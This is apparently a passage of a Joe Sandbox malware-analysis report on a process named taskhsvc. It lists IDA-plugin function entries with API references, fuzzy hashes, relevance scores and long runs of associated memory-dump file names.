Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: @
API String ID: 1027372294-2766056989
Opcode ID: cf141aacfb1a1730b0b62374b625a824b50160c99b0afa46270b6323d9ebf2d8
Instruction ID: 960558f3457c44af8c31d06dd74259b6349b4fcc5b809a68101d3ad0ca9ef3c9
Opcode Fuzzy Hash: cf141aacfb1a1730b0b62374b625a824b50160c99b0afa46270b6323d9ebf2d8
Instruction Fuzzy Hash: CE3144B2D047028FC760DF28D685B5AFBE0FB84360F498A1DE898E7254E735E844DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00DF3C99 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00DF3D3D

Part of subcall function 00EF86E9: __stack_chk_fail.LIBSSP-0 ref: 00EF8789

Part of subcall function 00EE7D3D: free.MSVCRT ref: 00EE7D98
Part of subcall function 00EE7D3D: __stack_chk_fail.LIBSSP-0 ref: 00EE7DAB

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

free.MSVCRT ref: 00DF3D25

Strings

@b, xrefs: 00DF3CF5

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$free
String ID: @b
API String ID: 2817809126-303848846
Opcode ID: 3c2e74a97a54392cc1e48baa9e9e34feb6b2eaaadad5cd440301d8b692e42d75
Instruction ID: 1ab96128344837daa166a4b8ce0d9b0b0912240befb6cd2514ecc428a3ec84a4
Opcode Fuzzy Hash: 3c2e74a97a54392cc1e48baa9e9e34feb6b2eaaadad5cd440301d8b692e42d75
Instruction Fuzzy Hash: 5E1172B490431A9FCB00EFA9C9457AEBBF4BF08304F458829E994E7341D7789A45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00E57868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00E57904

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00E578D8

Strings

n, xrefs: 00E578C8

Memory Dump Source

Source File: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abort
String ID: n
API String ID: 1190921433-2013832146
Opcode ID: cc61af5c05cbc5608a08245959a642ebab1beb78baa525df750dbee96e899fdf
Instruction ID: 7b59ab22205f8a53be2c33ce8a09cbf9178262d8e613b0c8fc7c03fa3a5149f0
Opcode Fuzzy Hash: cc61af5c05cbc5608a08245959a642ebab1beb78baa525df750dbee96e899fdf
Instruction Fuzzy Hash: 9E01E5B09083069FC704EF69C54965EBBF0AF44358F01D80CA9E89B355D37898898F52

Uniqueness

Uniqueness Score: -1.00%

Function 00DC21C1 Relevance: 4.7, APIs: 3, Instructions: 230COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00DC2287
abort.MSVCRT ref: 00DC232D

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00DBA80C: abort.MSVCRT ref: 00DBA87B
Part of subcall function 00DBA80C: abort.MSVCRT ref: 00DBA8BD
Part of subcall function 00DBA80C: abort.MSVCRT ref: 00DBA8FC
Part of subcall function 00DBA80C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D92F5D), ref: 00DBA983

__stack_chk_fail.LIBSSP-0 ref: 00DC2527

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort$strrchr
String ID:
API String ID: 2024191972-0
Opcode ID: 8dc683ff1ee206e367790751e6f1ccc85adcc7ccad83e71d6187d5882e089ad6
Instruction ID: c0c2f7b5ffc3a30d38c41f53525006e2f85a5ad6df0ac33af8cf06ccbe7d2df2
Opcode Fuzzy Hash: 8dc683ff1ee206e367790751e6f1ccc85adcc7ccad83e71d6187d5882e089ad6
Instruction Fuzzy Hash: 30B1C1B4909349DFCB00EFA9D185AADBBF1AB48300F14885DF484AB352D778D944DF66

Uniqueness

Uniqueness Score: -1.00%

Function 00EE5B2B Relevance: 4.7, APIs: 3, Instructions: 223fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF1144: memset.MSVCRT ref: 00EF117D
Part of subcall function 00EF1144: __stack_chk_fail.LIBSSP-0 ref: 00EF1190

Part of subcall function 00EE5895: strlen.MSVCRT ref: 00EE58CA
Part of subcall function 00EE5895: __stack_chk_fail.LIBSSP-0 ref: 00EE5904

CreateFileA.KERNEL32 ref: 00EE5BEF
free.MSVCRT ref: 00EE5E9E
__stack_chk_fail.LIBSSP-0 ref: 00EE5F2B

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
